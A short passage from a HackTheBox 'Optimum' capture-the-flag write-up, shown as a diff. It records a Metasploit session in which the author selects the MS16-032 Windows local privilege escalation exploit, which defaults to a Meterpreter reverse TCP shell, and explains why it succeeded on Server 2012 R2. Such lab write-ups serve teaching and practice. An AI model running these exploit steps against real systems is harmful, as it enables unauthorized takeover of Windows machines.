kryzii/WRITEUPS/2025/HTB/EASY/OPTIMUM/README.md

 msf post(multi/recon/local_exploit_suggester) >
 ```
 Ive tried multiple but one of it that work for me is `exploit/windows/local/ms16_032_secondary_logon_handle_privesc`:

+Here's why:
+> Most exploits failed because they were UAC bypasses (need admin group) or had validation issues.
+MS16-032 worked because it's a true privilege escalation from low-priv user → SYSTEM, which is exactly what you needed.
+It's one of the most reliable Windows local privesc exploits for Server 2012 R2!
 ```
 msf post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
 [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp